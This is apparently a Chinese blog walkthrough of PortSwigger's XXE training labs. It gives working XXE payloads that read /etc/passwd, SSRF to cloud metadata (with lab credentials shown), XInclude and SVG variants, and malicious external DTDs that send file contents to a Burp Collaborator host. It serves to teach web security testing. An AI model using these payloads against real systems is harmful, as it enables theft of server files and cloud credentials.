Portswigger靶场XML外部实体注入(XXE)实验
作者:互联网
Portswigger靶场XML外部实体注入(XXE)实验
利用XXE外部实体检索文件
Exploiting XXE using external entities to retrieve files
靶场
exploiting-xxe-to-retrieve-files
说明
This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.
To solve the lab, inject an XML external entity to retrieve the contents of the /etc/passwd
file.
题解
进入商品页面,提交查询库存请求,查看请求和响应
请求内容为XML,尝试使用fetch伪造请求
打开F12开发者调试控制台,构造以下请求,提交后查看响应,已获取到/etc/passed
的内容
fetch('https://ac3b1f4d1f818f20c0562bec00ce00ba.web-security-academy.net/product/stock',{
method:'POST',
headers:{
'Content-type':'application/xml'
},
body:`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>`
})
利用XXE实施SSRF攻击
Exploiting XXE to perform SSRF attacks
靶场
exploiting-xxe-to-perform-ssrf
说明
This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.
The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/
. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.
To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.
题解
进入商品页面,提交查询库存请求,查看请求和响应
请求内容为XML,尝试使用fetch伪造请求
fetch('https://ac191fb91fb9dab2c06e38f1007800c9.web-security-academy.net/product/stock',{
method:'POST',
headers:{
'Content-type':'application/xml'
},
body:`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>`
})
查看服务器响应,返回了:"Invalid product ID: latest"
修改请求中的http://169.254.169.254/
为http://169.254.169.254/latest
,提交
查看服务器响应,返回了:"Invalid product ID: meta-data"
修改请求中的http://169.254.169.254/
为http://169.254.169.254/latest
/meta-data,提交
不断重复以上步骤,直到url变为http://169.254.169.254/latest/meta-data/iam/security-credentials/admin
服务器响应
"Invalid product ID: {
"Code" : "Success",
"LastUpdated" : "2022-05-22T14:07:18.291567144Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "lZXgqhiqR1w4Y3WQzzX8",
"SecretAccessKey" : "nR49tc8qonlgyFlAmfETxJDklntBwnpX3KfluOS1",
"Token" : "Jiky4j1NJwywv1f6wh80UmVofsk0BlpWcjg4a5PxU23aa1gkuNJsxxdQGtS25L2XIKmB7jXqThyAHbbLxHqVpX9RXP1T5kO2M51FYh51KKywWrxoxZiWGD0tLaaBGEMXv5FflQtFMt7nMwgao1efh6GyHm8Qlxrr9hGOsIYf5WYMaQcU1jf0jqOqEHBoisk6KVdaQLh9jcQiSsqPRypWGagrpn6WcZAw1zgyvzsTqcm5kla8NdQVvlvynf3IU8kb",
"Expiration" : "2028-05-20T14:07:18.291567144Z"
}"
通过靶场
利用XInclude检索文件
Exploiting XInclude to retrieve files
靶场
说明
This lab has a "Check stock" feature that embeds the user input inside a server-side XML document that is subsequently parsed.
Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack.
To solve the lab, inject an XInclude
statement to retrieve the contents of the /etc/passwd
file.
题解
进入商品页面,提交查询库存请求,查看请求和响应
题目说明告诉我们查询库存的参数会被嵌入XML文档中解析,无法定义实体,使用XInclude
F12打开开发者调试控制台,找到查询库存名为productId的input元素标签,修改value值为以下内容:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
提交请求,查看响应,获取到密码文件,通过靶场
通过图像文件上传实现XEE
Exploiting XXE via image file upload
靶场
说明
This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
To solve the lab, upload an image that displays the contents of the /etc/hostname
file after processing. Then use the "Submit solution" button to submit the value of the server hostname.
提示
The SVG image format uses XML.
题解
新建svg文件,内容为:
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
进入博客评论,提交该文件,查看头像,获取文件内容,提交通过
带外XXE
Blind XXE with out-of-band interaction
靶场
xxe-with-out-of-band-interaction
说明
This lab has a "Check stock" feature that parses XML input but does not display the result.
You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.
To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.
注意
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.
题解
fetch('https://ac701f901e95770ec0b424b200dd0069.web-security-academy.net/product/stock',{
method:'POST',
headers:{
'Content-type':'application/xml'
},
body:`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://egyrorfpa2dh9zh6r95kzew1asgn4c.burpcollaborator.net"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>`
})
通过XML参数实体的带外XXE
Blind XXE with out-of-band interaction via XML parameter entities
靶场
xxe-with-out-of-band-interaction-using-parameter-entities
说明
This lab has a "Check stock" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.
To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.
注意
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.
题解
fetch('https://acbd1f0c1ec1771fc03021db00440047.web-security-academy.net/product/stock',{
method:'POST',
headers:{
'Content-type':'application/xml'
},
body:`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM "http://q4v3c331ye1txb5ifltwnqkdy44ysn.burpcollaborator.net"> %xxe; ]><stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>`
})
使用外部恶意DTD
Exploiting blind XXE to exfiltrate data using a malicious external DTD
靶场
xxe-with-out-of-band-exfiltration
说明
This lab has a "Check stock" feature that parses XML input but does not display the result.
To solve the lab, exfiltrate the contents of the /etc/hostname
file.
题解
官解
保存到服务器
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://198ehe8c3p642matkwy7s1po3f9bx0.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;
发送请求
fetch('https://acb51fd01e1adf8ac0c41802004f00b0.web-security-academy.net/product/stock',{
method:'POST',
headers:{
'Content-type':'application/xml'
},
body:`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-ac561f771e13dffdc0ea1841011c0023.web-security-academy.net/exploit"> %xxe;]><stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>`
})
在client获取到文件内容提交通过
利用XXE盲注通过报错信息获取文件
Exploiting blind XXE to retrieve data via error messages
靶场
xxe-with-data-retrieval-via-error-messages
说明
This lab has a "Check stock" feature that parses XML input but does not display the result.
To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd
file.
The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.
题解
官解
保存到服务器
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
发送请求,通过
fetch('https://acb21f381f228f01c01a42aa00080029.web-security-academy.net/product/stock',{
method:'POST',
headers:{
'Content-type':'application/xml'
},
body:`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-ac241f551ffa8f92c0a6428201af0098.web-security-academy.net/exploit"> %xxe;]><stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>`
})
通过修改本地DTD利用XXE检索数据
Exploiting XXE to retrieve data by repurposing a local DTD
靶场
xxe-trigger-error-message-by-repurposing-local-dtd
说明
This lab has a "Check stock" feature that parses XML input but does not display the result.
To solve the lab, trigger an error message containing the contents of the /etc/passwd
file.
You'll need to reference an existing DTD file on the server and redefine an entity from it.
提示
Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd
containing an entity called ISOamso.
题解
官解
fetch('https://ac011fed1f30af06c0fd3e10000b00eb.web-security-academy.net/product/stock',{
method:'POST',
headers:{
'Content-type':'application/xml'
},
body:`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]><stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>`
})
标签:XML,XXE,169.254,Portswigger,lab,xxe,stock 来源: https://www.cnblogs.com/zhoujinxuan/p/16299716.html